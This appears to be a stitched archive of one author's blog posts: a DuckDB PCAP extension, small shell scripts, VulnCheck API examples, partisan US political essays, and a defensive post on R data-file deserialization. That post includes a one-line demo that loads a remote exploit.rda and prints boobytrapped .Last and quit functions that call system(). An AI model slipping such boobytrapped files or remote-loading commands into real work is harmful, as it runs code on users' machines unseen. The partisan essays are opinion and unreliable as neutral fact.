2024-08-30 UPDATE:
Binary versions of this extension are available for amd64 Linux (linux_amd64 & linux_amd64_gcc4) and Apple Silicon macOS (osx_arm64).

$ duckdb -unsigned
v1.0.0 1f98600c2c
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
D SET custom_extension_repository='https://w3c2.c20.e2-5.dev/ppcap/latest';
D INSTALL ppcap;
D LOAD ppcap;

2024-08-29 UPDATE: The Apple Silicon macOS and Linux AMD64 versions of the plugin now work with PCAP files that are “Raw IP” vs. just “Ethernet”.

We generate a ton of PCAP files at $DAYJOB. Since I do not always have to work directly with them, I regularly mix up or forget the various tshark, tcpdump, etc., filters and CLI parameters. While this is less of an issue in the age of LLM/GPTs (just ask local ollama to gen the CLI incantation, and it usually does a good job), each failed command makes me miss Apache Drill just a tad, since it had/has a decent, albeit basic, PCAP reading capability.

For the past few months, I’ve had an “I should build a DuckDB extension to read PCAP files” idea floating in the back of my mind. Thanks to lingering issues from long covid, I’m back in the “let’s wake him up at 0-dark-30 and not let him get back to sleep” routine, so I decided to try to scratch this itch (I was actually hoping super focused work would engender slumber, but that, too, was a big fail).

The DuckDB folks have a spiffy extension template that you can use/fork to get started. It’s been a minute since I’ve had to work in C++ land, and I’m also used to working with system-level or vendored libraries when doing said work. So, first I had to figure out vcpkg — a C/C++ dependency manager from (ugh) Microsoft — as the DuckDB folks strongly encourage using it (and they use it). You likely do not have to get into the weeds, since there are three lines in the extension template that are (pretty much) all you really need to know/do.

Once that was done, I added libpcap to the DuckDB vcpkg deps. Then, a review of the structure of the example extension and the JSON, CSV, and Parquet reader extensions was in order to get a feel for how to add new functions, and return rectangular data from an entirely new file type.

To get started, I focused on some easy fields: source/destination IPs, timestamp, and payload length, and had some oddly great success. So, of course, I had to start a Mastodon thread.

The brilliant minds at DuckDB truly made it pretty straightforward to work with list/array columns, and write new utility functions, so I just kept adding fields and functionality until time ran out (adulting is hard).

At present, the extension exposes the following fields from a PCAP file:

  • timestamp
  • source_ip
  • dest_ip
  • source_port
  • dest_port
  • length
  • tcp_session
  • source_mac
  • dest_mac
  • protocols
  • payload
  • tcp_flags
  • tcp_seq_num

It also has a read_pcap function that supports wildcards or an array of filenames. And, there are three utility functions, one that does a naive test for whether a payload is an HTTP request or response, another that extracts HTTP request headers (if present), and one more that extracts some info from ICMP packets.
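
Here’s a minimal sketch of both input styles, assuming the extension is already installed (the paths are hypothetical):

duckdb -unsigned -s "
LOAD ppcap;
FROM read_pcap('captures/*.pcap') SELECT count(*) AS n_packets;
"

duckdb -unsigned -s "
LOAD ppcap;
FROM read_pcap(['day1.pcap', 'day2.pcap']) SELECT count(*) AS n_packets;
"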

Stop Telling Me And Show Me

Fine.

Here’s an incantation that naively converts all HTTP request and response packets to Parquet, since it will always be faster to use Parquet than it will be to use PCAPs:

duckdb -unsigned <<EOF
LOAD ppcap;

COPY (
  FROM 
    read_pcap('scans.pcap')
  SELECT
    *,
    is_http(payload) AS is_http,
    extract_http_request_headers(payload) AS req
) TO 'scans.parquet' (FORMAT PARQUET);
EOF

duckdb -json -s "FROM read_parquet('scans.parquet') WHERE is_http LIMIT 2" | jq
[
  {
    "timestamp": "2024-07-23 16:31:06",
    "source_ip": "94.156.71.207",
    "dest_ip": "203.161.44.208",
    "source_port": 49678,
    "dest_port": 80,
    "length": 154,
    "tcp_session": "94.156.71.207:49678-203.161.44.208:80",
    "source_mac": "64:64:9b:4f:37:00",
    "dest_mac": "00:16:3c:cb:72:42",
    "protocols": "[Ethernet, IP, TCP]",
    "payload": "GET /_profiler/phpinfo HTTP/1.1\\x0D\\x0AHost: 203.161.44.208\\x0D\\x0AUser-Agent: Web Downloader/6.9\\x0D\\x0AAccept-Charset: utf-8\\x0D\\x0AAccept-Encoding: gzip\\x0D\\x0AConnection: close\\x0D\\x0A\\x0D\\x0A",
    "tcp_flags": "[ACK, PSH]",
    "tcp_seq_num": "2072884123",
    "is_http": true,
    "req": "[{'key': Host, 'value': 203.161.44.208}, {'key': User-Agent, 'value': Web Downloader/6.9}, {'key': Accept-Charset, 'value': utf-8}, {'key': Accept-Encoding, 'value': gzip}, {'key': Connection, 'value': close}]"
  },
  {
    "timestamp": "2024-07-23 16:31:06",
    "source_ip": "203.161.44.208",
    "dest_ip": "94.156.71.207",
    "source_port": 80,
    "dest_port": 49678,
    "length": 456,
    "tcp_session": "203.161.44.208:80-94.156.71.207:49678",
    "source_mac": "00:16:3c:cb:72:42",
    "dest_mac": "64:64:9b:4f:37:00",
    "protocols": "[Ethernet, IP, TCP]",
    "payload": "HTTP/1.1 404 Not Found\\x0D\\x0ADate: Tue, 23 Jul 2024 16:31:06 GMT\\x0D\\x0AServer: Apache/2.4.52 (Ubuntu)\\x0D\\x0AContent-Length: 276\\x0D\\x0AConnection: close\\x0D\\x0AContent-Type: text/html; charset=iso-8859-1\\x0D\\x0A\\x0D\\x0A<!DOCTYPE HTML PUBLIC \\x22-//IETF//DTD HTML 2.0//EN\\x22>\\x0A<html><head>\\x0A<title>404 Not Found</title>\\x0A</head><body>\\x0A<h1>Not Found</h1>\\x0A<p>The requested URL was not found on this server.</p>\\x0A<hr>\\x0A<address>Apache/2.4.52 (Ubuntu) Server at 203.161.44.208 Port 80</address>\\x0A</body></html>\\x0A",
    "tcp_flags": "[ACK, PSH]",
    "tcp_seq_num": "2821588265",
    "is_http": true,
    "req": null
  }
]

The reason for the ppcap name is that I was too lazy to deal with some symbol name collisions (between the extension and libpcap) in a fancier manner. I’ll eventually figure out how to make it just pcap. PRs welcome.

How Do I Get This?

Well, for now, it’s a bit more complex than an INSTALL ppcap. My extension is not ready for prime time, so it won’t be in the DuckDB community extensions for a while. That means you’ll need to install it manually, and also get used to using the -unsigned CLI flag (I’ve aliased that to duckdbu).

NOTE: you need to be running v1.0.0+ of DuckDB for this extension to work.

Here’s how to install it on macOS + Apple Silicon and test to see if it worked:

# where extensions live on macOS + Apple Silicon
mkdir -p ~/.duckdb/extensions/v1.0.0/osx_arm64

# grab and "install" the extension
curl --output ~/.duckdb/extensions/v1.0.0/osx_arm64/ppcap.duckdb_extension https://rud.is/dl/pcap/darwin-arm64/ppcap.duckdb_extension

# this should not output anything if it worked
duckdb -unsigned -s "load ppcap"

Linux folks can sub out osx_arm64 and darwin-arm64 with linux_amd64 or linux_amd64_gcc4, depending on your system architecture, which you can find via duckdb -s "PRAGMA platform". linux_amd64_gcc4 is the architecture of the Linux amd64/x86_64 binary offered for download from DuckDB-proper.
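
For instance, a hypothetical Linux flavor of the macOS steps above (with those substitutions applied; double-check the download path against your platform string) looks like:

# confirm the platform string first
duckdb -s "PRAGMA platform"

# then swap it into both the extension directory and the download URL
mkdir -p ~/.duckdb/extensions/v1.0.0/linux_amd64_gcc4

curl --output ~/.duckdb/extensions/v1.0.0/linux_amd64_gcc4/ppcap.duckdb_extension https://rud.is/dl/pcap/linux_amd64_gcc4/ppcap.duckdb_extension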

Source is, sadly, on GitHub: https://github.com/hrbrmstr/duckdb-pcap.

Looks like I’m “back” 💪🏼.

Short post just to get the internets to index that I posted a repo with a small Bash script I’ve been using to resolve Bluesky/ATproto handles (like hrbrmstr.dev) to did:plc identifiers. Not sure why I didn’t do this ages ago, tbh.

Code is here but it’s small enough to include inline as well:

#!/usr/bin/env bash

set -euo pipefail

# Function to resolve Bluesky handle to DID:PLC
resolve_bluesky_handle() {
  local handle="${1:-}"

  # Remove leading '@' if present
  handle=$(echo "${handle}" | sed -e 's/^@//')

  # Check that the required tools are installed
  for tool in curl jq; do
    if ! command -v "${tool}" &>/dev/null; then
      echo "Error: ${tool} is not installed." >&2
      return 1
    fi
  done

  api_url="https://bsky.social/xrpc/com.atproto.identity.resolveHandle"

  # Fetch the handle's DID (--fail makes curl return non-zero on HTTP errors);
  # with `set -e`, a bare `$?` test after an assignment would never run,
  # so test the command substitution directly
  if ! response=$(curl --silent --fail --header "Accept: application/json" "${api_url}?handle=${handle}"); then
    echo "Error: Failed to fetch data from Bluesky API." >&2
    return 1
  fi

  # Extract the DID from the response
  if ! did=$(echo "${response}" | jq -r '.did'); then
    echo "Error: Failed to parse JSON response." >&2
    return 1
  fi

  # jq prints the literal string "null" when the key is absent
  if [[ -z "${did}" || "${did}" == "null" ]]; then
    echo "Error: DID not found in the response." >&2
    return 1
  fi

  echo "${did}"
}

# Check if exactly one argument is provided
if [[ $# -ne 1 ]]; then
  echo "Usage: $0 <handle>"
  exit 1
fi

resolve_bluesky_handle "${1}"
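
Usage is a one-liner (the script name is whatever you saved it as; output shape shown for illustration):

$ ./resolve-bluesky-handle.sh hrbrmstr.dev
did:plc:…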

Christian nationalists, the GOP, clueless Dems, & SCOTUS have done quite a bit of real, serious damage to the fragile state of democracy & discourse in the U.S. They’ve also set back 70+ years of hard-fought advancements at record speed.

It’s a big, complex problem to solve, and, if it all feels overwhelming, asymmetric & unfair, well, it is. Demoralizing us into anger-fueled apathy is one of the goals.

In one side of my profession, a process called “decomposition” is used to break a complex problem into smaller subproblems that are easier to solve. The subproblems are solved recursively or iteratively. The solutions to the subproblems are then combined to solve the original larger problem. Some subproblems can be solved in parallel, with different folks working on different subproblems; others need to wait for some subproblems to be solved first.

The big list of components of this present concern/danger needs to be enumerated & documented, so the actual subproblems can be identified. Nobody is going to do that for you/us. It’s a cognitively & emotionally painful, but important, step. But, it will also help folks explain the big picture to friends/family. The massive scope has to be understood, if only to help others grok that there is no quick, magic solution. It’s going to be a long, hard slog.

Once that settles in, the most essential thing happens next: what is the first subproblem that needs to be solved? It provides focus and — more importantly — an accomplishable goal.

I think it’s fair to say that one of the bigger subproblems is working to ensure no member of the GOP gets elected to any office in any capacity anywhere in the U.S. for the next forty years. They’ve demonstrated they can’t be trusted with power, and that they have no integrity or shame.

That’s a big subproblem.

Decomposition ultimately brings that down to what an individual can do in the place they live, which means you & I need to prevent GOP-aligned folks from being elected to:

  • local offices (including school boards)
  • state offices
  • federal offices
  • [V]POTUS

Organizations like Indivisible can help provide tangible, accomplishable tasks to complete in order to make that reality. Also: it kind of doesn’t matter “who” is opposite a GOP contender. What matters is that they’re neither in the GOP nor a fringe third-party with no chance of being elected. We’re all going to have to put away our pet desires/agendas for a few decades if we really want a foundation for change that can be built on.

A parallel, bigger subproblem is watching what local, state, and federal legislation is being floated/worked on, and pushing back hard. GovTrack, POGO, Common Cause, Public Citizen, and others can help with that, but the onus is on us to do the actual challenging.

And, another, parallel subproblem to work on is building community resilience and mutual aid networks, because we’re not going to fix every instance of every subproblem (e.g., despite solid efforts, GOP folks are almost certainly going to get elected to positions of power, and, thus, pose a real threat). GWU’s Center for Community Resilience is not a bad place to get started learning how to do that.

Those are three, tangible, accomplishable subproblems anyone can work on (even if you just focus on one of them).

It’s going to take a very long time to course correct. It will be very painful. And, far too many folks will get hurt along the way until things get better. But, giving in and doing nothing aren’t options.

[Image: three newspaper front pages covering the conviction of former President Donald Trump. The Wall Street Journal (Friday, May 31): “Trump Convicted” / “Verdict Shakes Up Presidential Campaign”. USA Today Weekend (Sunday, June 2): “Trump Guilty” / “Historic verdict: Trump is first former president convicted in a criminal case”. The New York Times (Friday, May 31): “Guilty” / “Jury Convicts Trump on All 34 Counts”.]

Wake the heck up, 🇺🇸. This is the company kept by the dude that 40+% of you want to give the keys to the country again. Crooks hang with crooks.

I don’t know about y’all, but I like candidates for U.S. President who haven’t been convicted of a felony.

Here’s the list of his felonious besties, just in case you want to “do your own research”.

2016 Campaign Officials

  1. Paul Manafort:
    • Role: Former Campaign Chairman
    • Convictions: Tax fraud, bank fraud, conspiracy charges related to money laundering, lobbying violations, and witness tampering.
    • Sentence: 7½ years in prison, later released to home confinement.
  2. Rick Gates:
    • Role: Deputy Campaign Chairman
    • Convictions: Conspiracy against the United States and lying to investigators.
    • Sentence: 45 days in jail and 36 months probation.
  3. Michael Flynn:
    • Role: Former National Security Adviser
    • Convictions: Lying to the FBI about his contacts with Russia.
    • Sentence: Initially pleaded guilty, later pardoned by Trump.
  4. George Papadopoulos:
    • Role: Campaign Adviser
    • Convictions: Lying to the FBI about his contacts with Russian officials.
    • Sentence: 14 days in prison.
  5. Roger Stone:
    • Role: Longtime Adviser
    • Convictions: Obstruction of a congressional investigation, making false statements to Congress, and witness tampering.
    • Sentence: 40 months in prison, later commuted by Trump.
  6. Steve Bannon:
    • Role: Former Chief Strategist
    • Charges: Fraud related to the “We Build the Wall” campaign.
    • Status: Arrested and charged, but not convicted at the time of reporting.

Administration Officials

  1. Michael Cohen:
    • Role: Former Personal Lawyer
    • Convictions: Tax evasion, bank fraud, campaign finance violations related to hush money payments.
    • Sentence: 3 years in prison, later released to home confinement.
  2. George Nader:
    • Role: Informal Adviser on Foreign Policy
    • Convictions: Possessing child pornography and bringing a boy to the United States for sex.
    • Sentence: 10 years in prison.
  3. Tom Barrack:
    • Role: Chair of Trump’s Inaugural Committee
    • Charges: Acting as an unregistered foreign agent and obstruction of justice.
    • Status: Arrested and charged, but not convicted at the time of reporting.
  4. Allen Weisselberg:
    • Role: Chief Financial Officer of the Trump Organization
    • Charges: Tax crimes related to perks he received.
    • Status: Pleaded not guilty, but the Trump Organization was also indicted.
  5. Rep. Chris Collins:
    • Role: Early Trump Supporter in Congress
    • Convictions: Securities fraud conspiracy and making false statements.
    • Sentence: 2 years and 2 months in federal prison.
  6. Rep. Duncan Hunter:
    • Role: Early Trump Supporter in Congress
    • Convictions: Misusing $250,000 of campaign funds for personal expenses.
    • Status: Pleaded guilty and resigned from his seat.

I had not planned to blog this (this is an incredibly time-crunched week for me), but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the rounds on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known, expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or if you do not fully know their provenance.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print, that object ends up in your global environment and gets invoked whenever print() is called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.
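
Here’s a quick shell-level sketch of that shadowing, with a benign cat() standing in for whatever an attacker would actually run:

Rscript -e '
  print <- function(x, ...) cat("this could just as easily have been system(...)\n")
  save(print, file = "evil.rda")  # serialize the boobytrapped object
'

Rscript -e '
  load("evil.rda")  # the attacker-defined print lands in the global environment
  print("hello")    # resolves to the loaded function, not base::print
'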

A tad more insidious is what happens when you quit R. Unless you specify otherwise, quit() will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from environment listings. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)
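
One mitigating habit, sketched below: list everything (including dot-prefixed names) right after loading a file you didn’t create. "some.rda" is a stand-in for whatever file you were handed:

Rscript -e '
  load("some.rda")
  # ls() hides dot-prefixed objects unless asked; cat() avoids a possibly-shadowed print
  cat(ls(all.names = TRUE), sep = "\n")
'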

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which will also get called by default when the objects are being destroyed on quit.
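
A tiny sketch of that finalizer behavior (harmless here; a system() call would fire just as readily):

Rscript -e '
  e <- new.env()
  # onexit = TRUE means the finalizer also fires on a normal quit
  reg.finalizer(e, function(x) cat("finalizer ran at exit\n"), onexit = TRUE)
'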

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on Linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

-----------------------------------------------
Loading R data file in quarantined environment…
-----------------------------------------------

Loading objects:
  .Last
  quit

-----------------------------------------
Enumerating objects in loaded R data file
-----------------------------------------

.Last : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> 
quit : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> 

------------------------------------
Functions found: enumerating sources
------------------------------------

Checking `.Last`…

!! `.Last` may execute arbitrary code on your system under certain conditions !!

`.Last` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}


Checking `quit`…

!! `quit` may execute arbitrary code on your system under certain conditions !!

`quit` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.

I use Fantastical as it’s a much cleaner and more native interface than Google Calendar, which I’m stuck using.

I like using the command line more than GUIs and, while I have other things set up to work with Google Calendar from the CLI, I’ve always wanted to figure out how to pull data from Fantastical into it.

So, I figured out a shortcut + Bash script combo to do that, and posted it into the box below. The link to the shortcut is in the comments of the script.

#!/usr/bin/env bash

# Changelog:
#
# 2024-03-23: Script created for scheduling tasks on macOS.
#             Added error handling, usage information, and best practices.

# Usage:
#
# This script is intended to be used for getting the day's schedule from Fantastical
# It takes an optional date parameter in the format YYYY-MM-DD and uses the
# macOS 'shortcuts' command to run a scheduling query task. If no date is provided,
# or if the provided date is invalid, it defaults to today's date.
#
# Shortcut URL: https://www.icloud.com/shortcuts/7dc5cf4801394d05b9a71e5044fbf461

# Exit immediately if a command exits with a non-zero status.
set -o errexit
# Make sure the exit status of a pipeline is the status of the last command to exit with a non-zero status, or zero if no command exited with a non-zero status.
set -o pipefail

# Function to clean up temporary files before script exits
cleanup() {
    rm -f "${SAVED}" "${OUTPUT}"
}

# Trap to execute the cleanup function on script exit
trap cleanup EXIT

# Check if a date parameter is provided
if [ "$1" ]; then
    INPUT_DATE=$(date -j -f "%Y-%m-%d" "$1" "+%Y-%m-%d" 2>/dev/null) || {
        echo "Invalid date format. Please use YYYY-MM-DD. Defaulting to today's date." >&2
        INPUT_DATE=$(date "+%Y-%m-%d")
    }
else
    INPUT_DATE=$(date "+%Y-%m-%d")
fi

# Create temporary files for saving clipboard contents and output
SAVED=$(mktemp)
OUTPUT=$(mktemp)

# Save current clipboard contents
pbpaste >"${SAVED}"

# Copy the input date to the clipboard
echo "${INPUT_DATE}" | pbcopy

# Run the 'sched' shortcut
shortcuts run "sched"

# Save the output from the 'sched' shortcut
pbpaste >"${OUTPUT}"

# Restore the original clipboard contents
pbcopy <"${SAVED}"

# Display the output from the 'sched' shortcut
cat "${OUTPUT}"

VulnCheck has some new, free API endpoints for the cybersecurity community.

Two extremely useful ones are for their extended version of CISA’s KEV, and an in-situ replacement for NVD’s sad excuse for an API and soon-to-be-removed JSON feeds.

There are two ways to work with these APIs. One is to retrieve a “backup” of the entire dataset as a ZIP file, and the other is to use the API to retrieve individual CVEs from each “index”.

You’ll need a free API key from VulnCheck to use these APIs.

All code shown makes the assumption that you’ve stored your API key in an environment variable named VULNCHECK_API_KEY.
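
For example, in your shell profile (the value is, of course, a placeholder):

export VULNCHECK_API_KEY="your-key-goes-here"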

After the curl examples, there’s a section on a small Golang CLI I made to make it easier to get combined extended KEV and NVDv2 CVE information in one CLI call for a given CVE.

Backups

Retrieving the complete dataset is a multi-step process. First, you make a call to the specific API endpoint for each index you want to back up. That returns some JSON containing a temporary, AWS pre-signed URL (a method to grant temporary access to files stored in AWS S3). Then you download the ZIP file from that URL, and finally you extract its contents into a directory. The output differs between the NVDv2 and extended KEV indexes, but the core process is the same.

NVDv2

Here’s a curl idiom for the NVDv2 index backup. The result is a directory of uncompressed JSON files in the same format as the NVDv2 JSON feeds.

# Grab the temporary AWS pre-signed URL for the NVDv2 index and then download the ZIP file.
curl \
  --silent \
  --output vcnvd2.zip --url "$(
    curl \
      --silent \
      --cookie "token=${VULNCHECK_API_KEY}" \
      --header 'Accept: application/json' \
      --url "https://api.vulncheck.com/v3/backup/nist-nvd2" | jq -r '.data[].url'
    )"

rm -rf ./nvd2

# unzip it
unzip -q -o -d ./nvd2 vcnvd2.zip

# uncompress the JSON files
gunzip ./nvd2/*.gz

tree ./nvd2
./nvd2
├── nvdcve-2.0-000.json
├── nvdcve-2.0-001.json
├── … (119 more files)
└── nvdcve-2.0-121.json

1 directory, 122 files

VulnCheck’s Extended KEV

Here’s a curl idiom for the extended KEV index backup. The result is a directory with a single uncompressed JSON file that’s in an extended format of the CISA KEV JSON.

# Grab the temporary AWS pre-signed URL for the extended KEV index and then download the ZIP file.
curl \
  --silent \
  --output vckev.zip --url "$(
    curl \
      --silent \
      --cookie "token=${VULNCHECK_API_KEY}" \
      --header 'Accept: application/json' \
      --url "https://api.vulncheck.com/v3/backup/vulncheck-kev" | jq -r '.data[].url'
    )"

rm -rf ./vckev

# unzip it
unzip -q -o -d ./vckev vckev.zip

tree ./vckev
./vckev
└── vulncheck_known_exploited_vulnerabilities.json

1 directory, 1 file

Retrieving Information On Individual CVEs

While there are other searchable fields for each index, the primary use case for most of us is getting information on individual CVEs. The API calls are virtually identical, apart from the selected index.

NOTE: the examples pipe the output through jq to make the API results easier to read.

NVDv2

curl \
  --silent \
  --cookie "token=${VULNCHECK_API_KEY}" \
  --header 'Accept: application/json' \
  --url "https://api.vulncheck.com/v3/index/nist-nvd2?cve=CVE-2024-23334" | jq
{
  "_benchmark": 0.056277,
  "_meta": {
    "timestamp": "2024-03-23T08:47:17.940032202Z",
    "index": "nist-nvd2",
    "limit": 100,
    "total_documents": 1,
    "sort": "_id",
    "parameters": [
      {
        "name": "cve",
        "format": "CVE-YYYY-N{4-7}"
      },
      {
        "name": "alias"
      },
      {
        "name": "iava",
        "format": "[0-9]{4}[A-Z-0-9]+"
      },
      {
        "name": "threat_actor"
      },
      {
        "name": "mitre_id"
      },
      {
        "name": "misp_id"
      },
      {
        "name": "ransomware"
      },
      {
        "name": "botnet"
      },
      {
        "name": "published"
      },
      {
        "name": "lastModStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "lastModEndDate",
        "format": "YYYY-MM-DD"
      }
    ],
    "order": "desc",
    "page": 1,
    "total_pages": 1,
    "max_pages": 6,
    "first_item": 1,
    "last_item": 1
  },
  "data": [
    {
      "id": "CVE-2024-23334",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Modified",
      "published": "2024-01-29T23:15:08.563",
      "lastModified": "2024-02-09T03:15:09.603",
      "descriptions": [
        {
          "lang": "en",
          "value": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.  Disabling follow_symlinks and using a reverse proxy are encouraged mitigations.  Version 3.9.2 fixes this issue."
        },
        {
          "lang": "es",
          "value": "aiohttp es un framework cliente/servidor HTTP asíncrono para asyncio y Python. Cuando se utiliza aiohttp como servidor web y se configuran rutas estáticas, es necesario especificar la ruta raíz para los archivos estáticos. Además, la opción 'follow_symlinks' se puede utilizar para determinar si se deben seguir enlaces simbólicos fuera del directorio raíz estático. Cuando 'follow_symlinks' se establece en Verdadero, no hay validación para verificar si la lectura de un archivo está dentro del directorio raíz. Esto puede generar vulnerabilidades de directory traversal, lo que resulta en acceso no autorizado a archivos arbitrarios en el sistema, incluso cuando no hay enlaces simbólicos presentes. Se recomiendan como mitigaciones deshabilitar follow_symlinks y usar un proxy inverso. La versión 3.9.2 soluciona este problema."
        }
      ],
      "references": [
        {
          "url": "https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b",
          "source": "security-advisories@github.com",
          "tags": [
            "Patch"
          ]
        },
        {
          "url": "https://github.com/aio-libs/aiohttp/pull/8079",
          "source": "security-advisories@github.com",
          "tags": [
            "Patch"
          ]
        },
        {
          "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f",
          "source": "security-advisories@github.com",
          "tags": [
            "Exploit",
            "Mitigation",
            "Vendor Advisory"
          ]
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/",
          "source": "security-advisories@github.com"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/",
          "source": "security-advisories@github.com",
          "tags": [
            "Mailing List"
          ]
        }
      ],
      "metrics": {
        "cvssMetricV31": [
          {
            "source": "nvd@nist.gov",
            "type": "Primary",
            "cvssData": {
              "version": "3.1",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "attackVector": "NETWORK",
              "attackComplexity": "LOW",
              "privilegesRequired": "NONE",
              "userInteraction": "NONE",
              "scope": "UNCHANGED",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "availabilityImpact": "NONE",
              "baseScore": 7.5,
              "baseSeverity": "HIGH"
            },
            "exploitabilityScore": 3.9,
            "impactScore": 3.6
          },
          {
            "source": "security-advisories@github.com",
            "type": "Secondary",
            "cvssData": {
              "version": "3.1",
              "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "attackVector": "NETWORK",
              "attackComplexity": "HIGH",
              "privilegesRequired": "NONE",
              "userInteraction": "NONE",
              "scope": "UNCHANGED",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "availabilityImpact": "NONE",
              "baseScore": 5.9,
              "baseSeverity": "MEDIUM"
            },
            "exploitabilityScore": 2.2,
            "impactScore": 3.6
          }
        ]
      },
      "weaknesses": [
        {
          "source": "security-advisories@github.com",
          "type": "Primary",
          "description": [
            {
              "lang": "en",
              "value": "CWE-22"
            }
          ]
        }
      ],
      "configurations": [
        {
          "nodes": [
            {
              "operator": "OR",
              "cpeMatch": [
                {
                  "vulnerable": true,
                  "criteria": "cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "1.0.5",
                  "versionEndExcluding": "3.9.2",
                  "matchCriteriaId": "CC18B2A9-9D80-4A6E-94E7-8FC010D8FC70"
                }
              ]
            }
          ]
        },
        {
          "nodes": [
            {
              "operator": "OR",
              "cpeMatch": [
                {
                  "vulnerable": true,
                  "criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*",
                  "matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646"
                }
              ]
            }
          ]
        }
      ],
      "_timestamp": "2024-02-09T05:33:33.170054Z"
    }
  ]
}

VulnCheck’s Extended KEV

curl \
  --silent \
  --cookie "token=${VULNCHECK_API_KEY}" \
  --header 'Accept: application/json' \
  --url "https://api.vulncheck.com/v3/index/vulncheck-kev?cve=CVE-2024-23334" | jq
{
  "_benchmark": 0.328855,
  "_meta": {
    "timestamp": "2024-03-23T08:47:41.025967418Z",
    "index": "vulncheck-kev",
    "limit": 100,
    "total_documents": 1,
    "sort": "_id",
    "parameters": [
      {
        "name": "cve",
        "format": "CVE-YYYY-N{4-7}"
      },
      {
        "name": "alias"
      },
      {
        "name": "iava",
        "format": "[0-9]{4}[A-Z-0-9]+"
      },
      {
        "name": "threat_actor"
      },
      {
        "name": "mitre_id"
      },
      {
        "name": "misp_id"
      },
      {
        "name": "ransomware"
      },
      {
        "name": "botnet"
      },
      {
        "name": "published"
      },
      {
        "name": "lastModStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "lastModEndDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "pubStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "pubEndDate",
        "format": "YYYY-MM-DD"
      }
    ],
    "order": "desc",
    "page": 1,
    "total_pages": 1,
    "max_pages": 6,
    "first_item": 1,
    "last_item": 1
  },
  "data": [
    {
      "vendorProject": "aiohttp",
      "product": "aiohttp",
